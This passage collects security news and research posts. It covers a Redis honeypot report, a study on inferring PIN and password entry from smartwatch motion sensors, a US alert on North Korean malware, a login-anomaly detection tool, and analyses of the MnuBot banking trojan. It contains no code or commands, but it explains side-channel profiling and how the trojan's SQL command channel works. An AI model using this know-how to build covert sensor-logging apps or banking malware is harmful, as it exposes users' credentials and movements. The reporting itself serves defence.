“Unsurprisingly, more than two-thirds of the open Redis servers contain malicious keys and three-quarters of the servers contain malicious values, suggesting that the server is infected.” continues the report.
“Also according to our honeypot data, the infected servers with “backup” keys were attacked from a medium-sized botnet ( ) located at China (86% of IPs).”
Imperva revealed that its customers were attacked more than 75k times, by 295 IPs that run publicly available Redis servers, this means that threat actors are exploiting vulnerable installs to compose their botnet and power a broad range of attacks (SQL injection, cross-site scripting, malicious file uploads, remote code executions, etc).
The “crackit” SSH key in the above table is known to be used at least since 2016 by a known threat actor to spread ransomware and to blackmail the owners of the compromised servers.
The main problem with Redis servers is that owners ignore that Redis doesn’t use a secure configuration by default because they are designed to operate in closed IT networks.
Before some recommendation to the admins operating Redis servers:
Make sure you follow Redis Security notes, i.e.
Don’t expose your Redis to the internet
If possible, apply authentication
Don’t store sensitive data in clear text
Monitor your Redis server to make sure it is not infected.
You can monitor processes or CPU consumption to check if a crypto mining malware is running. You can also use the keys and values mentioned in the tables above to monitor the data stored in your Redis server.
Make sure you run Redis with the minimal privileges necessary. Running it with root user, for example, is a bad practice, since it greatly increases the potential damage that an attacker can cause.
Trojan watch
1.6.2018 Kaspersky Virus
The cyberphysical risks of wearable gadgets
We continue to research how proliferation of IoT devices affects the daily lives of users and their information security. In our previous study, we touched upon ways of intercepting authentication data using single-board microcomputers. This time, we turned out attention to wearable devices: smartwatches and fitness trackers. Or more precisely, the accelerometers and gyroscopes inside them.
From the hoo-ha surrounding Strava, we already know that even impersonal data on user physical activity can make public what should be non-public information. But at the individual level, the risks are far worse: these smart devices are able to track the moments you’re entering a PIN code in an ATM, signing into a service, or unlocking a smartphone.
In our study, we examined how analyzing signals within wearable devices creates opportunities for potential intruders. The findings were less than encouraging: although looking at the signals from embedded sensors we investigated cannot (yet) emulate “traditional” keyloggers, this can be used to build a behavioral profile of users and detect the entry of critical data. Such profiling can happen discreetly using legitimate apps that run directly on the device itself. This broadens the capacity for cybercriminals to penetrate victims’ privacy and facilitates access to the corporate network of the company where they work.
So, first things first.
Behavioral profiling of users
When people hear the phrase ‘smart wearables’, they most probably think of miniature digital gadgets. However, it is important to understand that most smartwatches are cyberphysical systems, since they are equipped with sensors to measure acceleration (accelerometers) and rotation (gyroscopes). These are inexpensive miniature microcircuits that frequently contain magnetic field sensors (magnetometers) as well. What can be discovered about the user if the signals from these sensors are continuously logged? More than the owner of the gadget would like.
For the purpose of our study, we wrote a fairly simple app based on Google’s reference code and carried out some neat experiments with the Huawei Watch (first generation), Kingwear KW88, and PYiALCY X200 smartwatches based on the Android Wear 2.5 and Android 5.1 for Smartwatch operating systems. These watches were chosen for their availability and the simplicity of writing apps for them (we assume that exploiting the embedded gyroscope and accelerometer in iOS would follow a similar path).
Logging smartwatch signals during password entry
To determine the optimal sampling frequency of the sensors, we conducted a series of tests with different devices, starting with low-power models (in terms of processor) such as the Arduino 101 and Xiaomi Mi Band 2. However, the sensor sampling and data transfer rates were unsatisfactory — to obtain cross-correlation values that were more or less satisfactory required a sampling frequency of at least 50 Hz. We also rejected sampling rates greater than 100 Hz: 8 Kbytes of data per second might not be that much, but not for hours-long logs. As a result, our app sampled the embedded sensors with a frequency of 100 Hz and logged the instantaneous values of the accelerometer and gyroscope readings along three axes (x, y, z) in the phone’s memory.
Admittedly, getting a “digital snapshot” of a whole day isn’t that easy, because the Huawei watch’s battery life in this mode is no more than six hours.
But let’s take a look at the accelerometer readings for this period. The vertical axis shows the acceleration in m/s2, and the horizontal the number of samples (each corresponds to 10 milliseconds on average). For a complete picture, the accelerometer and gyroscope readings are presented in the graphs below.
Digital profile of a user recorded in one hour. Top — accelerometer signals, bottom — gyroscope signals
The graphs contains five areas in which different patterns are clearly visible. For those versed in kinematics, this graph tells a lot about the user.
The most obvious motion pattern is walking. We’ll start with that.
When the user is walking, the hand wearing the smartwatch oscillates like a pendulum. Pendulum swings are a periodic process. Therefore, if there are areas on the graph where the acceleration or orientation readings from the motion sensor vary according to the law of periodicity, it can be assumed that the user was walking at that moment. When analyzing the data, it is worth considering the accelerometer and gyroscope readings as a whole.
Let’s take a closer look at the areas with the greatest oscillations over short time intervals (the purple areas Pattern1, Pattern3, and Pattern5).
Accelerometer and gyroscope readings during walking
In our case, periodic oscillations of the hand were observed for a duration of 12 minutes (Pattern1, figure above). Without requesting geoinformation, it’s difficult to say exactly where the user was going, although a double numerical integration of the acceleration data shows with an accuracy up to the integration constants (initial velocity and coordinates) that the person was walking somewhere, and with varying characteristic velocity.
Result of the numerical integration of the accelerometer data, which gives an estimate of the user’s movement along the x and y axes in the space of one hour (z-axis displacement is zero, so the graph does not show it)
Note that plotting the Y-axis displacement relative to the X-axis displacement gives the person’s approximate path. The distances here are not overly precise, but they are in the order of thousands of meters, which is actually quite impressive, because the method is very primitive. To refine the distance traveled, anthropometric data can be used to estimate the length of each step (which is basically what fitness trackers do), but we shall not include this in our study.
Approximate path of the person under observation, determined on the basis of numerically integrating the accelerometer data along the X and Y axes
It is more difficult to analyze the less active areas. Clearly, the person was at rest during these periods. The orientation of the watch does not change, and there is acceleration, which suggests that the person is moving by car (or elevator).
Another 22-minute segment is shown below. This is clearly not walking — there are no observable periodic oscillations of the signal. However, we see a periodic change in the acceleration signal envelope along one axis. It might be a means of public transport that moves in a straight line, but with stops. What is it? Some sort of public transportation?
Accelerometer data when traveling on public transport
Here’s another time slice.
Pattern 3, accelerometer data
This seems to be a mixture of short periods of walking (for a few seconds), pauses, and abrupt hand movements. The person is presumably indoors.
Below we interpret all the areas on the graph.
Accelerometer and gyroscope readings with decoding of areas
These are three periods of walking (12, 3, and 5 minutes) interspersed with subway journeys (20 and 24 minutes). The short walking interval has some particular characteristics, since it involved changing from one subway line to another. These features are clearly visible, but our interest was in determining them using algorithms that can be executed on the wearable devices themselves. Therefore, instead of neural networks (which we know to be great at this kind of task), we used a simple cross-correlation calculation.
Taking two walking patterns (Walking1 and Walking2), we calculated their cross-correlation with each other and the cross-correlation with noise data using 10-second signal data arrays.
Function
Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
Walking1 and Walking2 0.73 0.70 0.64 0.62 0.41 0.83
Walking1 and Noise 0.33 0.30 0.32 0.30 0.33 0.33
Maxima of the functions for cross-correlation of walking patterns with each other and with an arbitrary noise pattern
It can be seen from the table that even this elementary approach for calculating cross-correlation functions allows us to identify the user’s movement patterns within his/her “digital snapshot” with an accuracy of up to 83% (given a very rough interpretation of the correlation). This indicator may not seem that high, but it should be stressed that we did not optimize the sample size and did not use more complex algorithms, for example, principle component analysis, which is assumed to work quite well in determining the characteristic parts of the signal log.
What does this provide to the potential attackers? Having identified the user’s movements in the subway, and knowing the characteristic directions of such movement, we can determine which subway line the user is traveling on. Sure, it would be much easier having data about the orientation of the X and Y axes in space, which could be obtained using a magnetometer. Unfortunately, however, the strong electromagnetic pickup from the electric motors, the low accuracy of determining a northerly direction, and the relatively few magnetometers in smartwatches forced us to abandon this idea.
Without data on the orientation of the X and Y axes in space (most likely, different for individual periods), the problem of decoding the motion trajectory becomes a geometric task of overlaying time slices of known length onto the terrain map. Again, placing ourselves in the attacker’s shoes, we would look for the magnetic field bursts indicate the acceleration/deceleration of an electric train (or tram or trolleybus), which can provide additional information allowing us to work out the number of interim points in the time slices of interest to us. But this too is outside the scope of our study.
Cyberphysical interception of critical data
But what does this all reveal about the user’s behavior? More than a bit, it turns out. It is possible to determine when the user arrives at work, signs into a company computer, unlocks his or her phone, etc. Comparing data on the subject’s movement with the coordinates, we can pinpoint the moments when they visited a bank and entered a PIN code at an ATM.
PIN codes
How easy is it to capture a PIN code from accelerometer and gyroscope signals from a smartwatch worn on the wrist? We asked four volunteers to enter personal PINs at a real ATM.
Accelerometer signals when entering a PIN code on an ATM keypad
Jumping slightly ahead, it’s not so simple to intercept an unencrypted PIN code from sensor readings by elementary means. However, this section of the “accelerometer log” gives away certain information — for example, the first half of the graph shows that the hand is in a horizontal position, while the oscillating values in the second half indicate keys being pressed on the ATM keypad. With neural networks, signals from the three axes of the accelerometer and gyroscope can be used to decipher the PIN code of a random person with a minimum accuracy of 80% (according to colleagues from Stevens Institute of Technology). The disadvantage of such an attack is that the computing power of smartwatches is not yet sufficient to implement a neural network; however, it is quite feasible to identify this pattern using a simple cross-correlation calculation and then transfer the data to a more powerful machine for decoding. Which is what we did, in fact.
Function
Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
One person and different tries 0.79 0.87 0.73 0.82 0.51 0.81
Maxima of the functions for cross-correlation of PIN entry data at an ATM
Roughly interpreting these results, it is possible to claim 87% accuracy in recovering the PIN entry pattern from the general flow of signal traffic. Not bad.
Passwords and unlock codes
Besides trips to the ATM, we were interested in two more scenarios in which a smartwatch can undermine user security: entering computer passwords and unlocking smartphones. We already knew the answer (for computers and phones) using a neural network, of course, but we still wanted to explore first-hand, so to speak, the risks of wearing a smartwatch.
Sure, capturing a password entered manually on a computer requires the person to wear a smartwatch on both wrists, which is an unlikely scenario. And although, theoretically, dictionaries could be used to recover semantically meaningful text from one-handed signals, it won’t help if the password is sufficiently strong. But, again, the main danger here is less about the actual recovery of the password from sensor signals than the ease of detecting when it is being entered. Let’s consider these scenarios in detail.
We asked four people to enter the same 13-character password on a computer 20 times. Similarly, we conducted an experiment in which two participants unlocked an LG Nexus 5X smartphone four times each with a 4-digit key. We also logged the movements of each participant when emulating “normal” behavior, especially in chat rooms. At the end of the experiment, we synchronized the time of the readings, cutting out superfluous signals.
In total, 480 discrete functions were obtained for all sensor axes. Each of them contains 250-350 readings, depending on the time taken to enter the password or arbitrary data (approximately three seconds).
Signal along the accelerometer and gyroscope axes for four attempts by one person to enter one password on a desktop computer
To the naked eye, the resulting graphs are almost identical; the extremes coincide, partly because the password and mode of entry were identical in all attempts. This means that the digital fingerprints produced by one and the same person are very similar to each other.
Signals along the accelerometer and gyroscope axes for attempts to enter the same password by different people on a desktop computer
When overlaying the signals received from different people, it can be seen that, although the passphrase is the same, it is entered differently, and even visually the extremes do not coincide!
Attempts to enter a smartphone unlock code by two different people
It is a similar story with mobile phones. Moreover, the accelerometer captures the moments when the screen is tapped with the thumb, from which the key length can be readily determined.
But the eye can be deceived. Statistics, on the other hand, are harder to hoodwink. We started with the simplest and most obvious method of calculating the cross-correlation functions for the password entry attempts by one person and for those by different people.
The table shows the maxima of the functions for cross-correlation of data for the corresponding axes of the accelerometer and gyroscope.
Function
Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
One person 0.92 0.63 0.71 0.55 0.76 0.96
Different persons 0.65 0.35 0.31 0.23 0.37 0.76
Maxima of the functions for cross-correlation of password input data entered by different people on a desktop computer
Broadly speaking, it follows that even a very simple cross-correlation calculation can identify a person with up to 96% accuracy! If we compare the maxima of the cross-correlation function for signals from different people in arbitrary text input mode, the correlation maximum does not exceed 44%.
Function
Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
One person and different activity 0.32 0.27 0.39 0.26 0.30 0.44
Maxima of the functions for cross-correlation of data for different activities (password entry vs. usual surfing)
Function
Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
One person 0.64 0.47 0.56 0.41 0.30 0.58
Different persons 0.33 0.40 0.40 0.32 0.38 0.34
Maxima of the functions for cross-correlation of data for an unlock code entered by one person and by different people
Note that the smallest cross-correlation function values were obtained for entering the smartphone unlock code (up to 64%), and the largest (up to 96%) for entering the computer password. This is to be expected, since the hand movements and corresponding acceleration (linear and angular) are minimal in the case of unlocking.
However, we note once more that the computing power available to a smartwatch is sufficient to calculate the correlation function, which means that a smart wearable gadget can perform this task by itself!
Conclusions
Speaking from the information security point of view, we can conclude that, without a doubt, portable cyberphysical systems expand the attack surface for potential intruders. That said, the main danger lies not in the direct interception of input data — that is quite difficult (the most successful results are achieved using neural networks) and thus far the accuracy leaves much to be desired. It lies instead in the profiling of users’ physical behavior based on signals from embedded sensors. Being “smart,” such devices are able to start and stop logging information from sensors not only through external commands, but on the occurrence of certain events or the fulfillment of certain conditions.
The recorded signals can be transmitted by the phone to the attacker’s server whenever the latter has access to the Internet. So an unassuming fitness app or a new watch face from the Google Play store can be used against you, right now in fact. The situation is compounded by the fact that, in addition to this app, simply sending your geotag once and requesting the email address linked to your Google Play account is enough to determine, based on your movements, who you are, where you’ve been, your smartphone usage, and when you entered a PIN at an ATM.
We found that extracting data from traffic likely to correspond to a password or other sensitive information (name, surname, email address) is a fairly straightforward task. Applying the full power of available recognition algorithms to these data on a PC or in cloud services, attackers, as shown earlier, can subsequently recover this sensitive information from accelerometer and gyroscope signal logs. Moreover, the accumulation of these signals over an extended period facilitates the tracking of user movements — and that’s without geoinformation services (such as GPS/GLONASS, or base station signals).
We established that the use of simple methods of analyzing signals from embedded sensors such as accelerometers and gyroscopes makes it possible (even with the computing power of a wearable device) to determine the moments when one and the same text is entered (for example, authentication data) to an accuracy of up to 96% for desktop computers and up to 64% for mobile devices. The latter accuracy could be improved by writing more complex algorithms for processing the signals received, but we intentionally applied the most basic mathematical toolbox. Considering that we viewed this experiment through the prism of the threat to corporate users, the results obtained for the desktop computer are a major cause for concern.
A probable scenario involving the use of wearable devices relates to downloading a legitimate app to a smartwatch — for example, a fitness tracker that periodically sends data packets of several dozen kilobytes in size to a server (for example, the uncompressed “signal signature” for the 13-character password was about 48 kilobytes).
Since the apps themselves are legitimate, we assume that, alongside our Android Wear/Android for Smartwatch test case, this scenario can be applied to Apple smartwatches, too.
Recommendations
There are several indications that an app downloaded onto a smartwatch might not be safe.
If, for instance, the app sends a request for data about the user’s account (the GET_ACCOUNTS permission in Android), this is cause for concern, since cybercriminals need to match the “digital fingerprint” with its owner. However, the app can also allow the user to register by providing an email address — but in this case you are at least free to enter an address different to that of the Google Play account to which your bank card is linked.
If the app additionally requests permission to send geolocation data, your suspicions should be aroused even further. The obvious advice in this situation is not to give additional permissions to fitness trackers that you download onto your smartwatch, and to specify a company email address at the time of registration.
A short battery life can also be a serious cause for concern. If your gadget discharges in just a few hours, this is a sign that you may be under observation. Theoretically, a smartwatch can store logs of your activity with length up to dozens of hours and upload this data later.
In general, we recommend keeping a close eye on smartwatches sported by employees at your office, and perhaps regulating their use in the company’s security policies. We plan to continue our research into cyberphysical systems such as wearable smart gadgets, and the additional risks of using them.
U.S. Attributes Two More Malware Families to North Korea
30.5.2018 securityweek Virus
The U.S. Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have issued another joint technical alert on the North Korea-linked threat group known as Hidden Cobra.
The latest alert attributes the Joanap backdoor trojan and the Brambul worm to the North Korean government. It provides IP addresses and other indicators of compromise (IoC) associated with these threats in an effort to help organizations protect their networks against attacks.
The threat actor tracked by the U.S. government as Hidden Cobra is known in the cybersecurity community as Lazarus Group, which is believed to be behind several high-profile attacks, including ones targeting Sony Pictures, Bangladesh’s central bank and various financial organizations. Some of the group’s campaigns are tracked as Operation Blockbuster, Dark Seoul and Operation Troy. Five Eyes countries have also officially blamed Lazarus for the WannaCry attack.US government shares details on Joanap and Brambul malware used by North Korea
According to the DHS and FBI, Joanap and Brambul have been used by Hidden Cobra since at least 2009 in attacks aimed at organizations in the United States and elsewhere, including in the media, financial, aerospace and critical infrastructure sectors.
Joanap is a two-stage malware that allows hackers to exfiltrate data and install other threats on the system.
Brambul is a worm that abuses the Server Message Block (SMB) protocol to spread to other systems through dictionary attacks. Its list of capabilities also includes harvesting system information (which it sends to the attackers via email), accepting command-line arguments, and executing what analysts call a “suicide script.”
The DHS and the FBI have published several alerts in the past year describing Hidden Cobra tools, including Sharpknot, Hardrain, Badcall, Bankshot, Fallchil, Volgmer, and Delta Charlie.
North Korea has been blamed for several major attacks, but Pyongyang has always denied the accusations. On the other hand, threat actors linked to North Korea don’t seem to be deterred by accusations and the numerous reports published in the past years by cybersecurity companies, and they continue launching attacks, including with new tools and zero-day exploits.
Open Source Tool From FireEye Helps Detect Malicious Logins
30.5.2018 securityweek Virus
FireEye has released GeoLogonalyzer, an open source tool that can help organizations detect malicious logins based on geolocation and other data.
Many organizations need to allow their employees to connect to enterprise systems from anywhere in the world. However, threat actors often rely on stolen credentials to access a targeted company’s systems.
Identifying legitimate logins and malicious ones can be challenging, but FireEye hopes to solve the problem with its GeoLogonalyzer, which leverages what the company calls GeoFeasibility.
GeoLogonalyzer analyzes authentication logs containing timestamps, usernames, and IP addresses, and highlights any changes, including related to anomalies, data center hosting information, location data, ASN information, and time and distance metrics.
GeoFeasibility looks at the location of the user who initiated a login in an effort to determine if the login is suspicious or not. For example, if a user connects to a company VPN from the United States, they are unlikely to connect to the VPN from Australia a few minutes later.
In addition to checking if accounts authenticate from two distant geographical locations in a short timeframe, GeoLogonalyzer looks at accounts that usually log in from IP addresses registered to one physical location, but also authenticate from places where the user is unlikely to be.
Logins from a foreign location where no employees reside or are expected to travel to, and where the organization does not have any business contacts will also raise a red flag.
Less obvious login patterns may also be considered suspicious, including user accounts that typically log in from one IP address, subnet or ASN, but also have a small number of logins from a different source, or ones that log in from IP addresses registered to cloud server hosting providers. Users who log in from multiple source hostnames or with multiple VPN clients are also considered suspicious.
Additional information and usage instructions are available on GitHub and FireEye’s blog post.
New Banking Trojan MnuBot uses SQL Server for Command and Control
30.5.2018 securityaffairs Virus
Researchers at IBM X-Force Research team discovered a new Delphi-based banking Trojan dubbed MnuBot that leverages Microsoft SQL Server for communication with the command and control (C&C).
The MnuBot Trojan implements a two-stage attack flow, it is composed of two main components that are tasked for the two stages.
In the first stage, the malware searches for a file called Desk.txt within the %AppData%Roaming folder.
If the file is not present, MnuBot creates it, creates a new desktop and switches the user workspace to that newly created desktop that runs side by side to the legitimate user desktop.
MnuBot continually checks the foreground window name in the new desktop searching for bank names in its configuration, then it will query the server for the second stage executable according to the specific bank name that was found.
The MnuBot implements the following capabilities:
Creating browser and desktop screenshots
Keylogging
Simulating user clicks and keystrokes
Restarting the victim machine
Uninstalling Trusteer Rapport from the system
Creating a form to overlay the bank’s forms and steal the data the user enters into the form
The malware downloads the malicious payload in as C:\Users\Public\Neon.exe, this binary contains the attack logic.
“the MnuBot malware uses a Microsoft SQL Server database server to communicate with the sample and send commands to be executed on the infected machine.” read the report published by IBM.
“Like any other RAT, MnuBot needs to receive commands from the server. To do so, it constantly queries the Microsoft SQL database server for a new command.”
Once the malware has infected the systems, it connects the C&C server to fetch the initial configuration. Experts found SQL server details (server address, port, username, and password) hardcoded inside the malware in an encrypted form.
The configuration also includes:
Queries to be performed
Commands the malicious actor can send
Files MnuBot will interact with
Bank websites that are being targeted
If the MnuBot malware is not able to access the configuration file it will shut itself down and does not perform any malicious activity on the infected machine.
The MnuBot uses the configuration to dynamically change the malicious activity (e.g., the banking sites that are targeted) and implement anti-research mechanisms.
Every time the attacker wants to send commands to the malware he updates specific columns inside a table stored in a database named jackjhonson.
“The attacker sends commands to the victims by updating specific columns inside a table called USUARIOCONTROLEXGORDO, which is stored in a database named jackjhonson.” continues analysis.
“A few interesting columns include the following:
COMP_ ACAO: This column identifies the type of command to be executed.
POSICAOMOUSE: In case the command is to simulate a user click, this column will be updated with the cursor position.
USER_IMAGEM: This column will be updated with the screenshot BMP image from the infected machine in case a screenshot was requested.
VALORINPUT: This column contains the input in case the command was input insertion.”
Like other malware families, MnuBot implements a full-screen overlay form to display victims overlaying forms used to trick them into providing sensitive data.
“Those forms are a type of social engineering to keep the user waiting. In the background, the cybercriminal takes control over the user endpoint and attempts to perform an illegal transaction via the victim’s open banking session.” concludes the report.
“MnuBot is an excellent example of many malware families in the Brazilian region. It holds many characteristics that are typical of other recently discovered malware strains. For example, the overlaying forms and the new desktop creation are well-known techniques that malware authors in the region use today.”
New Trojan Uses SQL Server for C&C
29.5.2018 securityweek Virus
A recently discovered banking Trojan leverages Microsoft SQL Server for communication with the command and control (C&C), IBM has discovered.
Dubbed MnuBot, the malware uses the database server for communication with the bot and to send commands to the infected machines. The Trojan features two components, each in charge of a different phase of a two-stage attack flow.
During the initial stage, the malware searches for a file called Desk.txt within the %AppData%Roaming folder. This file lets MnuBot know which desktop is currently running and, if it exists, the Trojan does nothing, because it knows it runs in a new desktop.
If the file doesn’t exist, then MnuBot creates it and a new desktop, and then switches the user workspace to the new desktop, which runs alongside the legitimate user desktop.
On the newly created desktop, MnuBot constantly checks the foreground window name and, if it finds a name similar to a bank name in its configuration, the malware queries the server for the second stage executable corresponding to that bank name.
The executable, which is saved as C:\Users\Public\Neon.exe, is actually a Remote Access Trojan (RAT) that provides the attacker with full control over the target machine. It also includes functionality unique to MnuBot, IMB explains.
Once the infection stage has been completed, the malware connects to the C&C server to fetch the initial configuration. The necessary SQL server details, such as server address, port, username and password, are hardcoded inside the malware in an encrypted form (they are decrypted dynamically just before initializing the connection).
Strings in the configuration include queries the malware should perform, supported commands, files to interact with, and targeted bank websites. Should the configuration be missing, MnuBot shuts itself down, meaning no malicious activity is performed on the infected machine.
The attackers can dynamically change MnuBot’s malicious activity by modifying the configuration directly on the server, and can also prevent researchers from reverse engineering the malware sample behavior if the author takes the server down.
Once the user opens the webpage of a targeted website, the second-stage payload provides the malware operator with an open session to the bank’s website, directly from the victim machine.
The malware provides the operator with the ability to create browser and desktop screenshots, log keystrokes, simulate user clicks and keystrokes, restart the victim machine, uninstall Trusteer Rapport from the system, create a form to overlay the bank’s page and steal the data the user enters there.
To send commands to the victim machine, the attacker updates specific columns inside a table stored in a database named jackjhonson. Columns there are meant to identify the type of command to be executed, to simulate a user click, to store screenshot bmp images from the infected machines in case a screenshot is needed, and to store the input required for input insertion commands.
MnuBot uses a full screen overlay form to prevent users from accessing the legitimate banking website and to trick them into revealing sensitive data. In the background, the malware operator takes control over the system and attempts to perform an illegal transaction via the already opened banking session.
The operator also asks the user for additional details if needed, using another overlaying form. The executable downloaded during the second stage of the attack contains the relevant social engineering forms the cybercriminals need for their nefarious operations.
MnuBot, which was observed targeting users in Brazil, is a great example of how malware authors constantly attempt to evolve their creations to evade regular anti-virus detection. In this case, they attempted to hide malicious network communications using seemingly innocent MS SQL traffic.